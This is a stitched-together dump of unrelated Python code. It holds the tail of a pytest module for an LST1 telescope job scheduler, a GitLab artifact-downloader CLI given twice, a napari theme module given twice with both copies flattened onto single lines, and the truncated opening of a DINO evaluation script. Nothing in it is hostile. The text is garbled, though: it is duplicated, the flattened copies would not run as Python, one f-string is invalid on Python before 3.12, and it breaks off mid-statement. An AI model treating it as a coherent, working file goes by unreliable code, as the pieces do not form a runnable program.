                f'01808.{{subruns:04d}}',
                'LST1'
            ])
        sys.exit(proc.returncode)"""
    )

    options.simulate = True
    assert content1 == expected_content1
    assert content2 == expected_content2


def test_create_job_scheduler_calibration(sequence_list):
    """Check the pilot job file for the calibration pipeline."""
    from osa.job import calibration_sequence_job_template

    options.test = True
    options.simulate = False
    content = calibration_sequence_job_template(sequence_list[0])
    expected_content = dedent(
        f"""\
        #!/bin/env python
        import os
        import subprocess
        import sys
        import tempfile
        subruns = 0
        with tempfile.TemporaryDirectory() as tmpdirname:
            os.environ['NUMBA_CACHE_DIR'] = tmpdirname
            proc = subprocess.run([
                'calibration_pipeline',
                '--config',
                '{Path.cwd()}/osa/configs/sequencer.cfg',
                '--date=2020-01-17',
                '--drs4-pedestal-run=01804',
                '--pedcal-run=01809',
                'LST1'
            ])
        sys.exit(proc.returncode)"""
    )
    options.simulate = True
    assert content == expected_content


def test_set_cache_dirs():
    from osa.job import set_cache_dirs

    cache = set_cache_dirs()
    cache_dirs = dedent(
        f"""\
        os.environ['CTAPIPE_CACHE'] = '{cfg.get('CACHE', 'CTAPIPE_CACHE')}'
        os.environ['CTAPIPE_SVC_PATH'] = '{cfg.get('CACHE', 'CTAPIPE_SVC_PATH')}'
        os.environ['MPLCONFIGDIR'] = '{cfg.get('CACHE', 'MPLCONFIGDIR')}'"""
    )
    assert cache_dirs == cache


def test_calibration_history_level():
    from osa.job import check_history_level

    levels = {"onsite_create_drs4_pedestal_file": 1, "onsite_create_calibration_file": 0}
    level, exit_status = check_history_level(calibration_history_file, levels)
    assert level == 0
    assert exit_status == 0


@pytest.fixture
def mock_sacct_output():
    """Mock output of sacct to be able to use it in get_sacct_output function."""
    return Path("./extra") / 'sacct_output.csv'


@pytest.fixture
def mock_squeue_output():
    """Mock output of squeue to be able to use it in get_squeue_output function."""
    return Path("./extra") / 'squeue_output.csv'


@pytest.fixture
def sacct_output(mock_sacct_output):
    from osa.job import get_sacct_output
    return get_sacct_output(mock_sacct_output)


@pytest.fixture
def squeue_output(mock_squeue_output):
    from osa.job import get_squeue_output
    return get_squeue_output(mock_squeue_output)


def test_set_queue_values(sacct_output, squeue_output, sequence_list):
    from osa.job import set_queue_values

    set_queue_values(
        sacct_info=sacct_output,
        squeue_info=squeue_output,
        sequence_list=sequence_list,
    )
    # Running calibration sequence
    assert sequence_list[0].state == "RUNNING"
    assert sequence_list[0].exit is None
    assert sequence_list[0].jobid == 12951086
    assert sequence_list[0].cputime == "00:36:00"
    assert sequence_list[0].tries == 4
    # Pending DATA sequences
    assert sequence_list[1].state == "PENDING"
    assert sequence_list[1].tries == 2
    assert sequence_list[1].exit is None
    assert sequence_list[2].state == "PENDING"
    assert sequence_list[2].exit is None
    assert sequence_list[2].tries == 1


def test_plot_job_statistics(sacct_output, running_analysis_dir):
    from osa.job import plot_job_statistics

    log_dir = running_analysis_dir / "log"
    log_dir.mkdir(parents=True, exist_ok=True)
    assert log_dir.exists()
    plot_job_statistics(sacct_output, log_dir)
    plot_file = log_dir / "job_statistics.pdf"
    assert plot_file.exists()


def test_run_program_with_history_logging(running_analysis_dir):
    from osa.job import run_program_with_history_logging

    options.simulate = False
    cmd = ["echo", "Testing"]
    history_file = running_analysis_dir / "test.history"
    run = "01140"
    prod_id = "v0.2.0"
    command = "echo"
    config_file = "config_test.json"

    rc = run_program_with_history_logging(
        command_args=cmd,
        history_file=history_file,
        run=run,
        prod_id=prod_id,
        command=command,
        config_file=config_file,
    )
    options.simulate = True

    assert rc == 0
    assert history_file.exists()
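# Why the expected job scripts above contain doubled braces: inside an
# f-string, `{{` and `}}` emit literal brace characters, so the generated
# script keeps `{subruns:04d}` for its own, later formatting. A minimal
# illustration (the run number is taken from the tests above):
run_number = 1807
line = f"f'{run_number:05d}.{{subruns:04d}}'"
assert line == "f'01807.{subruns:04d}'"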
import click
import gitlab
import os
import toml
from zipfile import ZipFile
from yaspin import yaspin
from appdirs import user_config_dir, user_data_dir
from pathlib import Path
import platform
import subprocess

CONFIG_FILE_NAME = "glap.toml"
CONFIG_PATH = user_config_dir("glap") + "/" + CONFIG_FILE_NAME
TMP_PATH = user_data_dir("glap")
PRIVATE_TOKEN_KEY = "private_token"
OAUTH_TOKEN_KEY = "oauth_token"
JOB_TOKEN_KEY = "job_token"


@click.group()
def main():
    pass


@main.command()
@click.argument('namespace')
@click.argument('repository')
@click.option('-o', '--output', default='.', type=click.Path(file_okay=False, dir_okay=True))
@click.option('--ref', default='main', type=click.STRING)
@click.option('-r', '--remote_name', type=click.STRING)
@click.option('-t', '--temp / --no-temp', default=False)
@click.option('-v', '--verbose / --no-verbose', default=False)
@click.option('-s', '--silent / --no-silent', default=False)
@click.option('-j', '--job', type=click.STRING)
def download(namespace, repository, output, ref, job, remote_name, temp, verbose, silent):
    if 'remotes' in config and len(list(config['remotes'])) > 0:
        all_remotes = config['remotes']
        if remote_name and remote_name in all_remotes:
            remote = all_remotes[remote_name]
        else:
            # fall back to the first configured remote
            first_remote = list(all_remotes.keys())[0]
            remote = all_remotes[first_remote]
        connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent)
    else:
        print("There are no remotes configured!")


def shortcut_command(shortcut):
    shortcut_config = config['shortcuts'][shortcut]
    default_remote = shortcut_config.get('remote')
    default_ref = shortcut_config.get('ref', 'main')
    default_job = shortcut_config.get('job')

    @click.option('-j', '--job', default=default_job, type=click.STRING)
    @click.option('--ref', default=default_ref, type=click.STRING)
    @click.option('-t', '--temp / --no-temp', default=False)
    @click.option('-r', '--remote_name', default=default_remote, type=click.STRING)
    @click.option('-o', '--output', default='.', type=click.Path(file_okay=False, dir_okay=True))
    @click.option('-v', '--verbose / --no-verbose', default=False)
    @click.option('-s', '--silent / --no-silent', default=False)
    def f(output, job, ref, remote_name, temp, verbose, silent):
        if remote_name not in config['remotes']:
            print(f"Cannot find remote {remote_name}! Check your remote configuration.")
            return
        remote = config['remotes'][remote_name]
        if 'namespace' not in shortcut_config:
            print(f"No namespace specified for shortcut {shortcut}!")
            return
        if 'repository' not in shortcut_config:
            print(f"No repository specified for shortcut {shortcut}!")
            return
        namespace = shortcut_config['namespace']
        repository = shortcut_config['repository']
        connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent)

    return f


def connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent):
    if check_remote(remote):
        try:
            gl = gitlab_instance(remote)
            project = gl.projects.get(f"{namespace}/{repository}", lazy=True)
            if verbose:
                # single-quoted key keeps this f-string valid on Python < 3.12 as well
                print(f"Job {job}@{ref} from {remote['url']}{namespace}/{repository}")
            download_and_unzip_artifacts(project, output, ref, job, temp, verbose, silent)
        except gitlab.GitlabGetError as error:
            print(f"Could not find GitLab repository: {error}")
        except Exception as error:
            print(f"Error while trying to connect to GitLab repository: {error}")


def check_remote(remote):
    if 'url' not in remote:
        print("Remote is not configured properly: No url specified!")
        return False
    elif len(set(remote).intersection(set([PRIVATE_TOKEN_KEY, OAUTH_TOKEN_KEY, JOB_TOKEN_KEY]))) != 1:
        print("Remote is not configured properly: There must be exactly one authentication token!")
        return False
    else:
        return True


def gitlab_instance(remote):
    url = remote['url']
    private_token = remote.get(PRIVATE_TOKEN_KEY)
    oauth_token = remote.get(OAUTH_TOKEN_KEY)
    job_token = remote.get(JOB_TOKEN_KEY)
    return gitlab.Gitlab(url, private_token, oauth_token, job_token)


def download_and_unzip_artifacts(project, output, ref_name, job, temp, verbose, silent):
    zipfn = "___artifacts.zip"
    success = False
    spinner = yaspin(text="Downloading", color="cyan")
    if not silent:
        spinner.start()
    try:
        with open(zipfn, "wb") as f:
            project.artifacts(ref_name=ref_name, job=job, streamed=True, action=f.write)
        success = True
    except gitlab.exceptions.GitlabGetError as error:
        if not silent:
            spinner.stop()
        print(f"Could not download artifacts for job {job}@{ref_name}: {error}!")
    else:
        if not silent:
            spinner.ok("✔")
    if success:
        with ZipFile(zipfn, 'r') as zipObj:
            if temp:
                # downloads requested as temporary go to a cleaned scratch directory
                Path(TMP_PATH).mkdir(parents=True, exist_ok=True)
                [f.unlink() for f in Path(TMP_PATH).glob("*") if f.is_file()]
                output = TMP_PATH
            zip_spinner = yaspin(text="Unzipping", color="cyan")
            if not silent:
                zip_spinner.start()
            zipObj.extractall(output)
            if not silent:
                zip_spinner.ok("✔")
            if verbose and not silent:
                print("Downloaded the following file(s):")
                for filename in zipObj.filelist:
                    print(f"- {filename.filename}")
        if temp:
            open_dir(TMP_PATH)
    os.unlink(zipfn)


def open_dir(path):
    if platform.system() == "Windows":
        os.startfile(path)
    elif platform.system() == "Darwin":
        subprocess.Popen(["open", path])
    else:
        subprocess.Popen(["xdg-open", path])


# Setup from config
if Path(CONFIG_FILE_NAME).is_file():
    config_file = CONFIG_FILE_NAME
elif Path(CONFIG_PATH).is_file():
    config_file = CONFIG_PATH
else:
    config_file = None

if config_file:
    try:
        config = toml.load(config_file)
        if 'shortcuts' in config:
            for shortcut in config['shortcuts']:
                main.command(name=shortcut)(shortcut_command(shortcut))
    except toml.TomlDecodeError as error:
        print(f"Could not decode configuration file {config_file}: {error}!")
        exit(1)
else:
    print(f"Could not find a configuration file at {CONFIG_PATH} or ./{CONFIG_FILE_NAME}!")
    exit(1)
import click import gitlab import os import toml from zipfile import ZipFile from yaspin import yaspin from appdirs import user_config_dir, user_data_dir from pathlib import Path import platform import subprocess CONFIG_FILE_NAME = "glap.toml" CONFIG_PATH = user_config_dir("glap") + "/" + CONFIG_FILE_NAME TMP_PATH = user_data_dir("glap") PRIVATE_TOKEN_KEY = "private_token" OAUTH_TOKEN_KEY = "oauth_token" JOB_TOKEN_KEY = "job_token" @click.group() def main(): pass @main.command() @click.argument('namespace') @click.argument('repository') @click.option('-o', '--output', default='.', type=click.Path(file_okay=False, dir_okay=True)) @click.option('--ref', default='main', type=click.STRING) @click.option('-r', '--remote_name', type=click.STRING) @click.option('-t', '--temp / --no-temp', default=False) @click.option('-v', '--verbose / --no-verbose', default=False) @click.option('-s', '--silent / --no-silent', default=False) @click.option('-j', '--job', type=click.STRING) def download(namespace, repository, output, ref, job, remote_name, temp, verbose, silent): if 'remotes' in config and len(list(config['remotes'])) > 0: all_remotes = config['remotes'] if remote_name and remote_name in all_remotes: remote = all_remotes[remote_name] else: first_remote = list(all_remotes.keys())[0] remote = all_remotes[first_remote] connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent) else: print("There are no remotes configured!") def shortcut_command(shortcut): shortcut_config = config['shortcuts'][shortcut] default_remote = shortcut_config.get('remote') default_ref = shortcut_config.get('ref', 'main') default_job = shortcut_config.get('job') @click.option('-j', '--job', default=default_job, type=click.STRING) @click.option('--ref', default=default_ref, type=click.STRING) @click.option('-t', '--temp / --no-temp', default=False) @click.option('-r', '--remote_name', default=default_remote, type=click.STRING) @click.option('-o', '--output', default='.', type=click.Path(file_okay=False, dir_okay=True)) @click.option('-v', '--verbose / --no-verbose', default=False) @click.option('-s', '--silent / --no-silent', default=False) def f(output, job, ref, remote_name, temp, verbose, silent): if remote_name not in config['remotes']: print(f"Cannot find remote {remote_name}! 
Check your remote configuration.") return remote = config['remotes'][remote_name] if 'namespace' not in shortcut_config: print(f"No namespace specified for shortcut {shortcut}!") return if 'repository' not in shortcut_config: print(f"No repository specified for shortcut {shortcut}!") return namespace = shortcut_config['namespace'] repository = shortcut_config['repository'] connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent) return f def connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent): if check_remote(remote): try: gl = gitlab_instance(remote) project = gl.projects.get(f"{namespace}/{repository}", lazy=True) if verbose: print( f"Job {job}@{ref} from {remote['url']}{namespace}/{repository}") download_and_unzip_artifacts( project, output, ref, job, temp, verbose, silent) except gitlab.GitlabGetError as error: print( f"Could not find GitLab repository: {error}") except Exception as error: print( f"Error while trying to connect to GitLab repository: {error}") def check_remote(remote): if 'url' not in remote: print("Remote is not configured properly: No url specified!") return False elif len(set(remote).intersection(set([PRIVATE_TOKEN_KEY, OAUTH_TOKEN_KEY, JOB_TOKEN_KEY]))) != 1: print("Remote is not configured properly: There must be exactly one authentication token!") return False else: return True def gitlab_instance(remote): url = remote['url'] private_token = remote.get(PRIVATE_TOKEN_KEY) oauth_token = remote.get(OAUTH_TOKEN_KEY) job_token = remote.get(JOB_TOKEN_KEY) return gitlab.Gitlab(url, private_token, oauth_token, job_token) def download_and_unzip_artifacts(project, output, ref_name, job, temp, verbose, silent): zipfn = "___artifacts.zip" success = False spinner = yaspin(text="Downloading", color="cyan") if not silent: spinner.start() try: with open(zipfn, "wb") as f: project.artifacts(ref_name=ref_name, job=job, streamed=True, action=f.write) success = True except gitlab.exceptions.GitlabGetError as error: if not silent: spinner.stop() print( f"Could not download artifacts for job {job}@{ref_name}: {error}!") else: if not silent: spinner.ok("✔") if success: with ZipFile(zipfn, 'r') as zipObj: if temp: Path(TMP_PATH).mkdir(parents=True, exist_ok=True) [f.unlink() for f in Path(TMP_PATH).glob("*") if f.is_file()] output = TMP_PATH zip_spinner = yaspin(text="Unzipping", color="cyan") if not silent: zip_spinner.start() zipObj.extractall(output) if not silent: zip_spinner.ok("✔") if verbose and not silent: print("Downloaded the following file(s):") for filename in zipObj.filelist: print(f"- {filename.filename}") if temp: open_dir(TMP_PATH) os.unlink(zipfn) def open_dir(path): if platform.system() == "Windows": os.startfile(path) elif platform.system() == "Darwin": subprocess.Popen(["open", path]) else: subprocess.Popen(["xdg-open", path]) # Setup from config if Path(CONFIG_FILE_NAME).is_file(): config_file = CONFIG_FILE_NAME elif Path(CONFIG_PATH).is_file(): config_file = CONFIG_PATH else: config_file = None if config_file: try: config = toml.load(config_file) if 'shortcuts' in config: for shortcut in config['shortcuts']: main.command(name=shortcut)(shortcut_command(shortcut)) except toml.TomlDecodeError as error: print(f"Could not decode configuration file {config_file}: {error}!") exit(1) else: print( f"Could not find a configuration file at {CONFIG_PATH} or ./{CONFIG_FILE_NAME}!") exit(1)
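The two copies of this file differ only in the f-string {remote["url"]} versus {remote['url']}, and the same one-character quoting difference recurs in every pair in this dump. A minimal sketch of the two styles (hypothetical dictionary; the second form requires Python 3.12+):

remote = {"url": "https://gitlab.example.com/"}

# Portable form: inner quotes differ from the outer ones, valid on any Python 3.
print(f"Fetching from {remote['url']}")

# Same-quote nesting inside a replacement field is only legal syntax on
# Python 3.12+ (PEP 701); earlier interpreters raise SyntaxError at parse time.
print(f"Fetching from {remote["url"]}")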
# syntax_style for the console must be one of the supported styles from # pygments - see here for examples https://help.farbox.com/pygments.html import re import warnings from ast import literal_eval from typing import Union from pydantic import validator from pydantic.color import Color try: from qtpy import QT_VERSION major, minor, *rest = QT_VERSION.split('.') use_gradients = (int(major) >= 5) and (int(minor) >= 12) except Exception: use_gradients = False from .._vendor import darkdetect from ..utils.translations import trans from .events import EventedModel from .events.containers._evented_dict import EventedDict class Theme(EventedModel): """Theme model. Attributes ---------- name : str Name of the virtual folder where icons will be saved to. syntax_style : str Name of the console style. See for more details: https://pygments.org/docs/styles/ canvas : Color Background color of the canvas. background : Color Color of the application background. foreground : Color Color to contrast with the background. primary : Color Color used to make part of a widget more visible. secondary : Color Alternative color used to make part of a widget more visible. highlight : Color Color used to highlight visual element. text : Color Color used to display text. warning : Color Color used to indicate something is wrong. current : Color Color used to highlight Qt widget. """ name: str syntax_style: str canvas: Color console: Color background: Color foreground: Color primary: Color secondary: Color highlight: Color text: Color icon: Color warning: Color current: Color @validator("syntax_style", pre=True) def _ensure_syntax_style(value: str) -> str: from pygments.styles import STYLE_MAP assert value in STYLE_MAP, trans._( "Incorrect `syntax_style` value provided. Please use one of the following: {syntax_style}", deferred=True, syntax_style=f" {", ".join(STYLE_MAP)}", ) return value gradient_pattern = re.compile(r'([vh])gradient\((.+)\)') darken_pattern = re.compile(r'{{\s?darken\((\w+),?\s?([-\d]+)?\)\s?}}') lighten_pattern = re.compile(r'{{\s?lighten\((\w+),?\s?([-\d]+)?\)\s?}}') opacity_pattern = re.compile(r'{{\s?opacity\((\w+),?\s?([-\d]+)?\)\s?}}') def darken(color: Union[str, Color], percentage=10): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() ratio = 1 - float(percentage) / 100 red, green, blue = color red = min(max(int(red * ratio), 0), 255) green = min(max(int(green * ratio), 0), 255) blue = min(max(int(blue * ratio), 0), 255) return f'rgb({red}, {green}, {blue})' def lighten(color: Union[str, Color], percentage=10): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() ratio = float(percentage) / 100 red, green, blue = color red = min(max(int(red + (255 - red) * ratio), 0), 255) green = min(max(int(green + (255 - green) * ratio), 0), 255) blue = min(max(int(blue + (255 - blue) * ratio), 0), 255) return f'rgb({red}, {green}, {blue})' def opacity(color: Union[str, Color], value=255): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() red, green, blue = color return f'rgba({red}, {green}, {blue}, {max(min(int(value), 255), 0)})' def gradient(stops, horizontal=True): if not use_gradients: return stops[-1] if horizontal: grad = 'qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0, ' else: grad = 'qlineargradient(x1: 0, y1: 0, x2: 
0, y2: 1, ' _stops = [f'stop: {n} {stop}' for n, stop in enumerate(stops)] grad += ", ".join(_stops) + ")" return grad def template(css: str, **theme): def darken_match(matchobj): color, percentage = matchobj.groups() return darken(theme[color], percentage) def lighten_match(matchobj): color, percentage = matchobj.groups() return lighten(theme[color], percentage) def opacity_match(matchobj): color, percentage = matchobj.groups() return opacity(theme[color], percentage) def gradient_match(matchobj): horizontal = matchobj.groups()[0] == 'h' stops = [i.strip() for i in matchobj.groups()[1].split('-')] return gradient(stops, horizontal) for k, v in theme.items(): css = gradient_pattern.sub(gradient_match, css) css = darken_pattern.sub(darken_match, css) css = lighten_pattern.sub(lighten_match, css) css = opacity_pattern.sub(opacity_match, css) if isinstance(v, Color): v = v.as_rgb() css = css.replace('{{ %s }}' % k, v) return css def get_system_theme(): """Return the system default theme, either 'dark', or 'light'.""" try: name = darkdetect.theme().lower() except Exception: name = "dark" return name def get_theme(name, as_dict=None): """Get a copy of theme based on its name. If you get a copy of the theme, changes to the theme model will not be reflected in the UI unless you replace or add the modified theme to the `_themes` container. Parameters ---------- name : str Name of requested theme. as_dict : bool Flag to indicate that the old-style dictionary should be returned. This will emit a deprecation warning. Returns ------- theme: dict of str: str Theme mapping elements to colors. A copy is created so that manipulating this theme can be done without side effects. """ if name == "system": name = get_system_theme() if name not in _themes: raise ValueError( trans._( "Unrecognized theme {name}. Available themes are {themes}", deferred=True, name=name, themes=available_themes(), ) ) theme = _themes[name] _theme = theme.copy() if as_dict is None: warnings.warn( trans._( "Themes were changed to use evented model with Pydantic's color type rather than the `rgb(x, y, z)`. The `as_dict=True` option will be changed to `as_dict=False` in 0.4.15", deferred=True, ), category=FutureWarning, stacklevel=2, ) as_dict = True if as_dict: _theme = _theme.dict() _theme = { k: v if not isinstance(v, Color) else v.as_rgb() for (k, v) in _theme.items() } return _theme return _theme def register_theme(name, theme): """Register a new or updated theme. Parameters ---------- name : str Name of requested theme. theme : dict of str: str, Theme Theme mapping elements to colors. """ if not isinstance(theme, Theme): theme = Theme(**theme) _themes[name] = theme def unregister_theme(name): """Remove existing theme. Parameters ---------- name : str Name of the theme to be removed. """ if name in _themes: _themes.pop(name) def available_themes(): """List available themes. Returns ------- list of str Names of available themes. """ return tuple(_themes) + ("system",) def rebuild_theme_settings(): """Update theme information in settings. Here we simply update the settings to reflect the current list of available themes. 
""" from ..settings import get_settings settings = get_settings() settings.appearance.refresh_themes() _themes: EventedDict[str, Theme] = EventedDict( { 'dark': Theme( **{ 'name': 'dark', 'background': 'rgb(38, 41, 48)', 'foreground': 'rgb(65, 72, 81)', 'primary': 'rgb(90, 98, 108)', 'secondary': 'rgb(134, 142, 147)', 'highlight': 'rgb(106, 115, 128)', 'text': 'rgb(240, 241, 242)', 'icon': 'rgb(209, 210, 212)', 'warning': 'rgb(153, 18, 31)', 'current': 'rgb(0, 122, 204)', 'syntax_style': 'native', 'console': 'rgb(0, 0, 0)', 'canvas': 'black', } ), 'light': Theme( **{ 'name': 'light', 'background': 'rgb(239, 235, 233)', 'foreground': 'rgb(214, 208, 206)', 'primary': 'rgb(188, 184, 181)', 'secondary': 'rgb(150, 146, 144)', 'highlight': 'rgb(163, 158, 156)', 'text': 'rgb(59, 58, 57)', 'icon': 'rgb(107, 105, 103)', 'warning': 'rgb(255, 18, 31)', 'current': 'rgb(253, 240, 148)', 'syntax_style': 'default', 'console': 'rgb(255, 255, 255)', 'canvas': 'white', } ), }, basetype=Theme, ) # this function here instead of plugins._npe2 to avoid circular import def _install_npe2_themes(_themes): try: import npe2 except ImportError: return for theme in npe2.PluginManager.instance().iter_themes(): # `theme.type` is dark/light and supplies defaults for keys that # are not provided by the plugin d = _themes[theme.type].dict() d.update(theme.colors.dict(exclude_unset=True)) _themes[theme.id] = Theme(**d) _install_npe2_themes(_themes) _themes.events.added.connect(rebuild_theme_settings) _themes.events.removed.connect(rebuild_theme_settings)
# syntax_style for the console must be one of the supported styles from # pygments - see here for examples https://help.farbox.com/pygments.html import re import warnings from ast import literal_eval from typing import Union from pydantic import validator from pydantic.color import Color try: from qtpy import QT_VERSION major, minor, *rest = QT_VERSION.split('.') use_gradients = (int(major) >= 5) and (int(minor) >= 12) except Exception: use_gradients = False from .._vendor import darkdetect from ..utils.translations import trans from .events import EventedModel from .events.containers._evented_dict import EventedDict class Theme(EventedModel): """Theme model. Attributes ---------- name : str Name of the virtual folder where icons will be saved to. syntax_style : str Name of the console style. See for more details: https://pygments.org/docs/styles/ canvas : Color Background color of the canvas. background : Color Color of the application background. foreground : Color Color to contrast with the background. primary : Color Color used to make part of a widget more visible. secondary : Color Alternative color used to make part of a widget more visible. highlight : Color Color used to highlight visual element. text : Color Color used to display text. warning : Color Color used to indicate something is wrong. current : Color Color used to highlight Qt widget. """ name: str syntax_style: str canvas: Color console: Color background: Color foreground: Color primary: Color secondary: Color highlight: Color text: Color icon: Color warning: Color current: Color @validator("syntax_style", pre=True) def _ensure_syntax_style(value: str) -> str: from pygments.styles import STYLE_MAP assert value in STYLE_MAP, trans._( "Incorrect `syntax_style` value provided. Please use one of the following: {syntax_style}", deferred=True, syntax_style=f" {', '.join(STYLE_MAP)}", ) return value gradient_pattern = re.compile(r'([vh])gradient\((.+)\)') darken_pattern = re.compile(r'{{\s?darken\((\w+),?\s?([-\d]+)?\)\s?}}') lighten_pattern = re.compile(r'{{\s?lighten\((\w+),?\s?([-\d]+)?\)\s?}}') opacity_pattern = re.compile(r'{{\s?opacity\((\w+),?\s?([-\d]+)?\)\s?}}') def darken(color: Union[str, Color], percentage=10): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() ratio = 1 - float(percentage) / 100 red, green, blue = color red = min(max(int(red * ratio), 0), 255) green = min(max(int(green * ratio), 0), 255) blue = min(max(int(blue * ratio), 0), 255) return f'rgb({red}, {green}, {blue})' def lighten(color: Union[str, Color], percentage=10): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() ratio = float(percentage) / 100 red, green, blue = color red = min(max(int(red + (255 - red) * ratio), 0), 255) green = min(max(int(green + (255 - green) * ratio), 0), 255) blue = min(max(int(blue + (255 - blue) * ratio), 0), 255) return f'rgb({red}, {green}, {blue})' def opacity(color: Union[str, Color], value=255): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() red, green, blue = color return f'rgba({red}, {green}, {blue}, {max(min(int(value), 255), 0)})' def gradient(stops, horizontal=True): if not use_gradients: return stops[-1] if horizontal: grad = 'qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0, ' else: grad = 'qlineargradient(x1: 0, y1: 0, x2: 
0, y2: 1, ' _stops = [f'stop: {n} {stop}' for n, stop in enumerate(stops)] grad += ", ".join(_stops) + ")" return grad def template(css: str, **theme): def darken_match(matchobj): color, percentage = matchobj.groups() return darken(theme[color], percentage) def lighten_match(matchobj): color, percentage = matchobj.groups() return lighten(theme[color], percentage) def opacity_match(matchobj): color, percentage = matchobj.groups() return opacity(theme[color], percentage) def gradient_match(matchobj): horizontal = matchobj.groups()[0] == 'h' stops = [i.strip() for i in matchobj.groups()[1].split('-')] return gradient(stops, horizontal) for k, v in theme.items(): css = gradient_pattern.sub(gradient_match, css) css = darken_pattern.sub(darken_match, css) css = lighten_pattern.sub(lighten_match, css) css = opacity_pattern.sub(opacity_match, css) if isinstance(v, Color): v = v.as_rgb() css = css.replace('{{ %s }}' % k, v) return css def get_system_theme(): """Return the system default theme, either 'dark', or 'light'.""" try: name = darkdetect.theme().lower() except Exception: name = "dark" return name def get_theme(name, as_dict=None): """Get a copy of theme based on its name. If you get a copy of the theme, changes to the theme model will not be reflected in the UI unless you replace or add the modified theme to the `_themes` container. Parameters ---------- name : str Name of requested theme. as_dict : bool Flag to indicate that the old-style dictionary should be returned. This will emit a deprecation warning. Returns ------- theme: dict of str: str Theme mapping elements to colors. A copy is created so that manipulating this theme can be done without side effects. """ if name == "system": name = get_system_theme() if name not in _themes: raise ValueError( trans._( "Unrecognized theme {name}. Available themes are {themes}", deferred=True, name=name, themes=available_themes(), ) ) theme = _themes[name] _theme = theme.copy() if as_dict is None: warnings.warn( trans._( "Themes were changed to use evented model with Pydantic's color type rather than the `rgb(x, y, z)`. The `as_dict=True` option will be changed to `as_dict=False` in 0.4.15", deferred=True, ), category=FutureWarning, stacklevel=2, ) as_dict = True if as_dict: _theme = _theme.dict() _theme = { k: v if not isinstance(v, Color) else v.as_rgb() for (k, v) in _theme.items() } return _theme return _theme def register_theme(name, theme): """Register a new or updated theme. Parameters ---------- name : str Name of requested theme. theme : dict of str: str, Theme Theme mapping elements to colors. """ if not isinstance(theme, Theme): theme = Theme(**theme) _themes[name] = theme def unregister_theme(name): """Remove existing theme. Parameters ---------- name : str Name of the theme to be removed. """ if name in _themes: _themes.pop(name) def available_themes(): """List available themes. Returns ------- list of str Names of available themes. """ return tuple(_themes) + ("system",) def rebuild_theme_settings(): """Update theme information in settings. Here we simply update the settings to reflect the current list of available themes. 
""" from ..settings import get_settings settings = get_settings() settings.appearance.refresh_themes() _themes: EventedDict[str, Theme] = EventedDict( { 'dark': Theme( **{ 'name': 'dark', 'background': 'rgb(38, 41, 48)', 'foreground': 'rgb(65, 72, 81)', 'primary': 'rgb(90, 98, 108)', 'secondary': 'rgb(134, 142, 147)', 'highlight': 'rgb(106, 115, 128)', 'text': 'rgb(240, 241, 242)', 'icon': 'rgb(209, 210, 212)', 'warning': 'rgb(153, 18, 31)', 'current': 'rgb(0, 122, 204)', 'syntax_style': 'native', 'console': 'rgb(0, 0, 0)', 'canvas': 'black', } ), 'light': Theme( **{ 'name': 'light', 'background': 'rgb(239, 235, 233)', 'foreground': 'rgb(214, 208, 206)', 'primary': 'rgb(188, 184, 181)', 'secondary': 'rgb(150, 146, 144)', 'highlight': 'rgb(163, 158, 156)', 'text': 'rgb(59, 58, 57)', 'icon': 'rgb(107, 105, 103)', 'warning': 'rgb(255, 18, 31)', 'current': 'rgb(253, 240, 148)', 'syntax_style': 'default', 'console': 'rgb(255, 255, 255)', 'canvas': 'white', } ), }, basetype=Theme, ) # this function here instead of plugins._npe2 to avoid circular import def _install_npe2_themes(_themes): try: import npe2 except ImportError: return for theme in npe2.PluginManager.instance().iter_themes(): # `theme.type` is dark/light and supplies defaults for keys that # are not provided by the plugin d = _themes[theme.type].dict() d.update(theme.colors.dict(exclude_unset=True)) _themes[theme.id] = Theme(**d) _install_npe2_themes(_themes) _themes.events.added.connect(rebuild_theme_settings) _themes.events.removed.connect(rebuild_theme_settings)
# Copyright (c) Facebook, Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import sys import argparse import json from pathlib import Path import torch from torch import nn import torch.distributed as dist import torch.backends.cudnn as cudnn from torchvision import datasets from torchvision import transforms as pth_transforms from torchvision import models as torchvision_models import utils import vision_transformer as vits def eval_linear(args): utils.init_distributed_mode(args) print("git:\n {}\n".format(utils.get_sha())) print("\n".join("%s: %s" % (k, str(v)) for k, v in sorted(dict(vars(args)).items()))) cudnn.benchmark = True # ============ preparing data ... ============ train_transform = pth_transforms.Compose([ pth_transforms.RandomResizedCrop(224), pth_transforms.RandomHorizontalFlip(), pth_transforms.ToTensor(), pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), ]) val_transform = pth_transforms.Compose([ pth_transforms.Resize(256, interpolation=3), pth_transforms.CenterCrop(224), pth_transforms.ToTensor(), pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), ]) dataset_train = datasets.ImageFolder(os.path.join(args.data_path, "train"), transform=train_transform) dataset_val = datasets.ImageFolder(os.path.join(args.data_path, "val"), transform=val_transform) sampler = torch.utils.data.distributed.DistributedSampler(dataset_train) train_loader = torch.utils.data.DataLoader( dataset_train, sampler=sampler, batch_size=args.batch_size_per_gpu, num_workers=args.num_workers, pin_memory=True, ) val_loader = 